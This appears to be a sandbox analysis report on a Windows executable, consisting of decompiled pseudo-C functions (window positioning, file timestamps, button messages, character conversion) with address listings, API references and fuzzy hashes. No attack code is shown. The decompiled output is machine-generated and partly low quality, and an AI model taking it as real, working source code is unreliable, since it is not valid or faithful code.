                                                                                                                            0x00416058
                                                                                                                            0x0041605b
                                                                                                                            0x0041605c
                                                                                                                            0x00416061
                                                                                                                            0x00416066
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416068
                                                                                                                            0x0041606d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041606f
                                                                                                                            0x00416072
                                                                                                                            0x00416073
                                                                                                                            0x00416078
                                                                                                                            0x0041607d
                                                                                                                            0x00416083
                                                                                                                            0x00416085
                                                                                                                            0x0041608a
                                                                                                                            0x00416092
                                                                                                                            0x00416095
                                                                                                                            0x0041609b
                                                                                                                            0x0041609b
                                                                                                                            0x0041608a
                                                                                                                            0x0041609e
                                                                                                                            0x004160a4
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041602F
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004160F3
                                                                                                                            • CoTaskMemFree.OLE32(?,00000010), ref: 004161A0
                                                                                                                            • CoTaskMemFree.OLE32(?,00000010), ref: 004161AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 365290523-0
                                                                                                                            • Opcode ID: 777c06793824dd9d4a647eb5c008fa0ddbf164ddf7f8defda9fcd3dd2fa44105
                                                                                                                            • Instruction ID: aca8cbdcd827ca666605847a89366bf3f7a02a49d8b381e61e01bf28c823017e
                                                                                                                            • Opcode Fuzzy Hash: 777c06793824dd9d4a647eb5c008fa0ddbf164ddf7f8defda9fcd3dd2fa44105
                                                                                                                            • Instruction Fuzzy Hash: C8714871600601DFCB20DFA5C9C58AAB7F2BF48304765086EE546DB762CB79ED84CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00415C52 Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 26%
                                                                                                                            			E00415C52(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				intOrPtr* _t72;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				signed int _t81;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t94;
				signed int _t95;
				signed int _t121;
				void* _t138;
				void* _t141;
				intOrPtr* _t142;
				signed int** _t144;
				signed int* _t145;
				signed int _t148;
				signed int _t150;
				void* _t152;
				void* _t155;

				_t138 = __edx;
				_t121 = __ecx;
				_t152 = _t155;
				_t148 = __ecx;
				_t62 =  *((intOrPtr*)(__ecx + 4));
				_push(_t141);
				if(_t62 != 0) {
					_t63 =  *(_t62 + 0x28);
					__eflags = _t63;
					if(_t63 == 0) {
						goto L3;
					} else {
						_t121 = _t63;
						_t67 = E0040B451(_t121, _t141);
						__eflags = _t67;
						_v8 = _t67;
						if(_t67 == 0) {
							goto L3;
						} else {
							_t68 = IsWindowVisible( *(_t67 + 0x20));
							asm("sbb eax, eax");
							_t70 =  ~_t68 + 1;
							__eflags = _t70;
							_v24 = _t70;
							if(_t70 != 0) {
								GetWindowRect( *(E0040A17C(0, _t138, _t152, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t138;
								E0040CEE1(_v8, _v56.right - _v56.left - _t138 >> 1, _v56.bottom - _v56.top - _t138 >> 1, 0, 0, 0);
								E0040CF1F(_v8, 1);
							}
							_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 4)) + 0x50));
							_t142 = _t148 + 0x48;
							_t73 =  *((intOrPtr*)( *_t72))(_t72, 0x4350a0, _t142);
							__eflags = _t73;
							if(_t73 < 0) {
								_t75 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 4)) + 0x50));
								_t76 =  *((intOrPtr*)( *_t75))(_t75, 0x4350f8,  &_v16);
								__eflags = _t76;
								if(_t76 >= 0) {
									_t77 = _v16;
									 *((intOrPtr*)( *_t77 + 0x14))(_t77,  &_v20);
									_t79 = _v16;
									 *((intOrPtr*)( *_t79 + 8))(_t79);
									_t81 = _v20;
									__eflags = _t81;
									if(_t81 != 0) {
										_t144 = _t148 + 8;
										_v12 =  *((intOrPtr*)( *_t81))(_t81, 0x437acc, _t144);
										_t83 = _v20;
										 *((intOrPtr*)( *_t83 + 8))(_t83);
										_t76 = _v12;
										__eflags = _t76;
										if(__eflags >= 0) {
											_t145 =  *_t144;
											 *( *_t145)(_t145, 0x437abc, _t148 + 0xc);
											goto L20;
										}
									} else {
										_t76 = 0x80004005;
									}
								}
							} else {
								_t94 =  *_t142;
								_t145 = _t148 + 0x4c;
								_t95 =  *((intOrPtr*)( *_t94 + 0xc))(_t94, 0, 0x437d4c, _t145);
								__eflags =  *_t145;
								_v12 = _t95;
								if( *_t145 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L20:
									_t87 = E0041517C(0, _t148, _t145, _t148, __eflags);
									__eflags = _v24;
									_t150 = _t87;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E0040CEE1(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E0040CF1F(_v8, 0);
									}
									_t76 = _t150;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E0040CEE1(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E0040CF1F(_v8, 0);
									}
									_t76 = _v12;
								}
							}
							return _t76;
						}
					}
				} else {
					L3:
					_push(_t152);
					_push(_t121);
					_v76 = 0x4408f8;
					E00420866( &_v76, 0x43b8fc);
					asm("int3");
					_t66 = _t121;
					 *((intOrPtr*)(_t66 + 4)) = 1;
					return _t66;
				}
			}










































                                                                                                                            0x00415c52
                                                                                                                            0x00415c52
                                                                                                                            0x00415c53
                                                                                                                            0x00415c5a
                                                                                                                            0x00415c5c
                                                                                                                            0x00415c63
                                                                                                                            0x00415c64
                                                                                                                            0x00415c6b
                                                                                                                            0x00415c6e
                                                                                                                            0x00415c70
                                                                                                                            0x00000000
                                                                                                                            0x00415c72
                                                                                                                            0x00415c72
                                                                                                                            0x00415c74
                                                                                                                            0x00415c79
                                                                                                                            0x00415c7b
                                                                                                                            0x00415c7e
                                                                                                                            0x00000000
                                                                                                                            0x00415c80
                                                                                                                            0x00415c83
                                                                                                                            0x00415c8b
                                                                                                                            0x00415c8d
                                                                                                                            0x00415c8d
                                                                                                                            0x00415c8e
                                                                                                                            0x00415c91
                                                                                                                            0x00415cac
                                                                                                                            0x00415cb8
                                                                                                                            0x00415cc3
                                                                                                                            0x00415cd2
                                                                                                                            0x00415cd3
                                                                                                                            0x00415cd8
                                                                                                                            0x00415ce2
                                                                                                                            0x00415ce2
                                                                                                                            0x00415cea
                                                                                                                            0x00415cef
                                                                                                                            0x00415cf9
                                                                                                                            0x00415cfb
                                                                                                                            0x00415cfd
                                                                                                                            0x00415d5e
                                                                                                                            0x00415d6d
                                                                                                                            0x00415d6f
                                                                                                                            0x00415d71
                                                                                                                            0x00415d77
                                                                                                                            0x00415d81
                                                                                                                            0x00415d84
                                                                                                                            0x00415d8a
                                                                                                                            0x00415d8d
                                                                                                                            0x00415d90
                                                                                                                            0x00415d92
                                                                                                                            0x00415d9d
                                                                                                                            0x00415da9
                                                                                                                            0x00415dac
                                                                                                                            0x00415db2
                                                                                                                            0x00415db5
                                                                                                                            0x00415db8
                                                                                                                            0x00415dba
                                                                                                                            0x00415dbc
                                                                                                                            0x00415dca
                                                                                                                            0x00000000
                                                                                                                            0x00415dca
                                                                                                                            0x00415d94
                                                                                                                            0x00415d94
                                                                                                                            0x00415d94
                                                                                                                            0x00415d92
                                                                                                                            0x00415cff
                                                                                                                            0x00415cff
                                                                                                                            0x00415d03
                                                                                                                            0x00415d0e
                                                                                                                            0x00415d11
                                                                                                                            0x00415d13
                                                                                                                            0x00415d16
                                                                                                                            0x00415d18
                                                                                                                            0x00415d18
                                                                                                                            0x00415d1f
                                                                                                                            0x00415d22
                                                                                                                            0x00415dcc
                                                                                                                            0x00415dce
                                                                                                                            0x00415dd3
                                                                                                                            0x00415dd6
                                                                                                                            0x00415dd8
                                                                                                                            0x00415de8
                                                                                                                            0x00415df2
                                                                                                                            0x00415dfb
                                                                                                                            0x00415dfb
                                                                                                                            0x00415e00
                                                                                                                            0x00415d28
                                                                                                                            0x00415d28
                                                                                                                            0x00415d2b
                                                                                                                            0x00415d3b
                                                                                                                            0x00415d45
                                                                                                                            0x00415d4e
                                                                                                                            0x00415d4e
                                                                                                                            0x00415d53
                                                                                                                            0x00415d53
                                                                                                                            0x00415d22
                                                                                                                            0x00415e06
                                                                                                                            0x00415e06
                                                                                                                            0x00415c7e
                                                                                                                            0x00415c66
                                                                                                                            0x00415c66
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rect$DesktopVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1055025324-0
                                                                                                                            • Opcode ID: 90a72af2e7da9f2d8ebb0c16200f70111de2c5898c373eddab305a225a793523
                                                                                                                            • Instruction ID: d3c973f801d38b934e312182a6f1638f91decd9624b65e100d8c7ee9a92b96fb
                                                                                                                            • Opcode Fuzzy Hash: 90a72af2e7da9f2d8ebb0c16200f70111de2c5898c373eddab305a225a793523
                                                                                                                            • Instruction Fuzzy Hash: D551EC75A0060AEFCB10DFA8C985CEEB7B9FF88304B244569F506E7251DB35AE41CB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041C2B4 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041C2B4(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t102 = _a4;
				_t100 = __ecx;
				E0041EC90(__ecx, _t102, 0, 0x128);
				E0040CDBE(_t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x4354ac; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E0041C13C( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E0041C256(0,  &_v36, _t101,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E0041C13C( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E0041C256(0,  &_v36, _t101,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E0041C13C( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E0041C256(0,  &_v36, _t101,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}





















                                                                                                                            0x0041c2bc
                                                                                                                            0x0041c2c9
                                                                                                                            0x0041c2cb
                                                                                                                            0x0041c2de
                                                                                                                            0x0041c2e3
                                                                                                                            0x0041c2e9
                                                                                                                            0x0041c2ef
                                                                                                                            0x0041c403
                                                                                                                            0x00000000
                                                                                                                            0x0041c405
                                                                                                                            0x0041c2fd
                                                                                                                            0x0041c30a
                                                                                                                            0x0041c317
                                                                                                                            0x0041c320
                                                                                                                            0x0041c323
                                                                                                                            0x0041c326
                                                                                                                            0x0041c32c
                                                                                                                            0x0041c332
                                                                                                                            0x0041c34a
                                                                                                                            0x0041c334
                                                                                                                            0x0041c334
                                                                                                                            0x0041c334
                                                                                                                            0x0041c358
                                                                                                                            0x0041c374
                                                                                                                            0x0041c376
                                                                                                                            0x0041c35a
                                                                                                                            0x0041c363
                                                                                                                            0x0041c36a
                                                                                                                            0x0041c36f
                                                                                                                            0x0041c36f
                                                                                                                            0x0041c384
                                                                                                                            0x0041c3a5
                                                                                                                            0x0041c3a8
                                                                                                                            0x0041c386
                                                                                                                            0x0041c38f
                                                                                                                            0x0041c396
                                                                                                                            0x0041c39c
                                                                                                                            0x0041c39c
                                                                                                                            0x0041c3b6
                                                                                                                            0x0041c3d7
                                                                                                                            0x0041c3da
                                                                                                                            0x0041c3b8
                                                                                                                            0x0041c3c1
                                                                                                                            0x0041c3c8
                                                                                                                            0x0041c3ce
                                                                                                                            0x0041c3ce
                                                                                                                            0x0041c3e2
                                                                                                                            0x0041c3e7
                                                                                                                            0x0041c3ec
                                                                                                                            0x0041c3ec
                                                                                                                            0x0041c3f5
                                                                                                                            0x0041c3fa
                                                                                                                            0x0041c400
                                                                                                                            0x0041c400
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041c326
                                                                                                                            0x0041c30c
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041C2CB
                                                                                                                              • Part of subcall function 0040CDBE: _wctomb_s.LIBCMT ref: 0040CDCE
                                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 0041C302
                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0041C317
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 26245289-0
                                                                                                                            • Opcode ID: 1dec866a2ace2a47f4deb0f962084d13e50547b113f5ab9b0569b2edaa7dcb37
                                                                                                                            • Instruction ID: c42c1c5f117af832994f7b8a0d0dabc4c5e5017655783267b5eda700b4e494c6
                                                                                                                            • Opcode Fuzzy Hash: 1dec866a2ace2a47f4deb0f962084d13e50547b113f5ab9b0569b2edaa7dcb37
                                                                                                                            • Instruction Fuzzy Hash: 6D414D715407059FCB24DFA5DDC18EBB7F8BB083247108A2EE5A6D3690E734E984CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D2CA Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E0040D2CA(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				void* __esi;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E0041936B( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E00403A5E( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E00403A5E( &_a4)));
								_v8 =  *((intOrPtr*)(E00403A5E( &_a4)));
								if((E0040CFE6(_t37, 0) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E0040D0D1( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E0040D0D1( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E0040CFE6(_t63, 0);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}













                                                                                                                            0x0040d2cd
                                                                                                                            0x0040d2ce
                                                                                                                            0x0040d2d1
                                                                                                                            0x0040d2d8
                                                                                                                            0x0040d2de
                                                                                                                            0x0040d2e3
                                                                                                                            0x0040d2f3
                                                                                                                            0x0040d30c
                                                                                                                            0x0040d314
                                                                                                                            0x0040d31c
                                                                                                                            0x0040d31f
                                                                                                                            0x0040d329
                                                                                                                            0x0040d36a
                                                                                                                            0x0040d33f
                                                                                                                            0x0040d343
                                                                                                                            0x0040d350
                                                                                                                            0x00000000
                                                                                                                            0x0040d352
                                                                                                                            0x0040d352
                                                                                                                            0x0040d358
                                                                                                                            0x00000000
                                                                                                                            0x0040d3c5
                                                                                                                            0x0040d3c5
                                                                                                                            0x0040d3c5
                                                                                                                            0x00000000
                                                                                                                            0x0040d3c5
                                                                                                                            0x0040d358
                                                                                                                            0x00000000
                                                                                                                            0x0040d350
                                                                                                                            0x0040d375
                                                                                                                            0x0040d37f
                                                                                                                            0x0040d3be
                                                                                                                            0x0040d395
                                                                                                                            0x0040d39a
                                                                                                                            0x0040d39d
                                                                                                                            0x0040d3b2
                                                                                                                            0x0040d3b2
                                                                                                                            0x0040d3bc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d39f
                                                                                                                            0x0040d3ad
                                                                                                                            0x00000000
                                                                                                                            0x0040d3af
                                                                                                                            0x0040d3af
                                                                                                                            0x00000000
                                                                                                                            0x0040d3af
                                                                                                                            0x0040d3ad
                                                                                                                            0x00000000
                                                                                                                            0x0040d39d
                                                                                                                            0x0040d2f5
                                                                                                                            0x0040d2fe
                                                                                                                            0x0040d303
                                                                                                                            0x0040d306
                                                                                                                            0x0040d3c8
                                                                                                                            0x0040d3d1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d306
                                                                                                                            0x0040d3d3
                                                                                                                            0x0040d3d3
                                                                                                                            0x0040d2e3
                                                                                                                            0x0040d3d7

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: a063e42f5288c9c324733d73220c1786a978b805345e6118b7c3290acb6a369b
                                                                                                                            • Instruction ID: 6f6b8e651fd8c45b4f5736ddcd11eecde96fe8fc71b4dde05a078ed4b03caff3
                                                                                                                            • Opcode Fuzzy Hash: a063e42f5288c9c324733d73220c1786a978b805345e6118b7c3290acb6a369b
                                                                                                                            • Instruction Fuzzy Hash: F831A730900119FBCB24DF91C881EAF7B69EF01350F10807BF905EB291DA749D85CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042BE82 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0042BE82(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E0041EE3B( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0042BB43( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0041EC4C(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                            0x0042be8a
                                                                                                                            0x0042be91
                                                                                                                            0x0042bea6
                                                                                                                            0x00000000
                                                                                                                            0x0042be98
                                                                                                                            0x0042be9a
                                                                                                                            0x0042beb2
                                                                                                                            0x0042beb7
                                                                                                                            0x0042beba
                                                                                                                            0x0042bebd
                                                                                                                            0x0042bee6
                                                                                                                            0x0042beeb
                                                                                                                            0x0042beef
                                                                                                                            0x0042bf70
                                                                                                                            0x0042bf82
                                                                                                                            0x0042bf8b
                                                                                                                            0x0042bf8d
                                                                                                                            0x0042becd
                                                                                                                            0x0042becd
                                                                                                                            0x0042bed0
                                                                                                                            0x0042bed2
                                                                                                                            0x0042bed5
                                                                                                                            0x0042bed5
                                                                                                                            0x0042bed5
                                                                                                                            0x0042bed5
                                                                                                                            0x00000000
                                                                                                                            0x0042bedb
                                                                                                                            0x0042bf4f
                                                                                                                            0x0042bf4f
                                                                                                                            0x0042bf54
                                                                                                                            0x0042bf5a
                                                                                                                            0x0042bf5d
                                                                                                                            0x0042bf5f
                                                                                                                            0x0042bf62
                                                                                                                            0x0042bf62
                                                                                                                            0x0042bf62
                                                                                                                            0x0042bf62
                                                                                                                            0x00000000
                                                                                                                            0x0042bf66
                                                                                                                            0x0042bef1
                                                                                                                            0x0042bef4
                                                                                                                            0x0042bef4
                                                                                                                            0x0042befa
                                                                                                                            0x0042befd
                                                                                                                            0x0042bf24
                                                                                                                            0x0042bf27
                                                                                                                            0x0042bf27
                                                                                                                            0x0042bf2d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0042bf2f
                                                                                                                            0x0042bf32
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0042bf34
                                                                                                                            0x0042bf34
                                                                                                                            0x0042bf37
                                                                                                                            0x0042bf37
                                                                                                                            0x0042bf3d
                                                                                                                            0x0042beab
                                                                                                                            0x0042beab
                                                                                                                            0x0042bf46
                                                                                                                            0x00000000
                                                                                                                            0x0042bf46
                                                                                                                            0x0042beff
                                                                                                                            0x0042bf02
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0042bf06
                                                                                                                            0x0042bf14
                                                                                                                            0x0042bf17
                                                                                                                            0x0042bf1d
                                                                                                                            0x0042bf1f
                                                                                                                            0x0042bf22
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0042bf22
                                                                                                                            0x0042bebf
                                                                                                                            0x0042bec2
                                                                                                                            0x0042bec4
                                                                                                                            0x0042beca
                                                                                                                            0x0042beca
                                                                                                                            0x00000000
